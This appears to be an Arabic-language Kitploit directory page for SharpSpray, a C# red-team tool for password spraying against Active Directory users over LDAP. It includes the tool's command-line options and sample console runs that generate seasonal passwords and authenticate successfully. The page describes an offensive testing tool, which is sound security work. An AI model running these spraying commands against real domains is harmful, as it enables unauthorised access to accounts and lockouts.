Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SharpSpray — أداة بلغة C# للهجمات الآلية لرش كلمات المرور (Password Spraying) ضد مستخدمي Active Directory عبر LDAP، مع تأخيرات قابلة للتكوين وقوائم كلمات مرور، مصممة لعمليات الفريق الأحمر. | Kitploit
أدوات/GitHubGitHub/jnqpblc/sharpspray
هجمات كلمات المروراختبار الاختراقالمصادقةالفريق الأحمر
GitHubjnqpblc/sharpspray

SharpSpray

أداة بلغة C# للهجمات الآلية لرش كلمات المرور (Password Spraying) ضد مستخدمي Active Directory عبر LDAP، مع تأخيرات قابلة للتكوين وقوائم كلمات مرور، مصممة لعمليات الفريق الأحمر.

عرض المستودع
19533منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SharpSpray

هذا المشروع هو نسخة C# من سكريبت PowerSpray.ps1 الخاص بي. SharpSpray عبارة عن مجموعة أكواد بسيطة لتنفيذ هجوم رش كلمات المرور (password spraying) ضد جميع مستخدمي نطاق باستخدام LDAP وهو متوافق مع Cobalt Strike.

https://github.com/jnqpblc/Misc-PowerShell/blob/master/PowerSpray.ps1

بشكل افتراضي، سيقوم تلقائياً بإنشاء قائمة المستخدمين من النطاق.

بشكل افتراضي، سيقوم تلقائياً بإنشاء قائمة كلمات المرور باستخدام التاريخ الحالي.

كن حذراً حتى لا تقفل أي حسابات.

root@kitploit:~
SharpSpray.exe
      --Seeds [ A comma-separated list of passwords to as a seed to the internal list generator. Eg. Password,Welcome,Company ]
      --Passwords [ A comma-separated list of passwords to use instead of the internal list generator. Eg. Password1,Password19,Company19,Welcome19 ]
      --Delay [ The delay time between guesses in millisecounds. Eg. 300 ]
      --Sleep [ The number of minutes to sleep between password cycles. Eg. 15 ]

C:\Users\jnqpblc\Desktop>SharpSpray.exe --Sleep 15
[+] Successfully collected 42 usernames from Active Directory.
[*] The Lockout Threshold for the current domain is 10.
[*] The Min Password Length for the current domain is 10.
[+] Successfully generated a list of 64 passwords.
[*] Starting password spraying operations.
[*] Using the default delay of 1000 milliseonds between attempts.
[*] Using password Winter19
^C

C:\Users\jnqpblc\Desktop>SharpSpray.exe --Seeds Password,Welcome,Company --Sleep 15
[+] Successfully collected 42 usernames from Active Directory.
[*] The Lockout Threshold for the current domain is 10.
[*] The Min Password Length for the current domain is 10.
[+] Successfully generated a list of 42 passwords.
[*] Starting password spraying operations.
[*] Using the default delay of 1000 milliseonds between attempts.
[*] Using password Password19
^C

C:\Users\jnqpblc\Desktop>SharpSpray.exe --Passwords ItsNotWinter! --Sleep 15 --Delay 300
[+] Successfully collected 42 usernames from Active Directory.
[*] The Lockout Threshold for the current domain is 10.
[*] The Min Password Length for the current domain is 10.
[+] Successfully generated a list of 1 passwords.
[*] Starting password spraying operations.
[*] Using a delay of 300 milliseonds between attempts.
[*] Using password ItsNotWinter!
[+] Successfully authenticated with jnqpblc::ItsNotWinter!
[*] Completed all rounds with password ItsNotWinter!
[*] Now the script will sleep for 15 minutes.
^C
تنزيل الأداة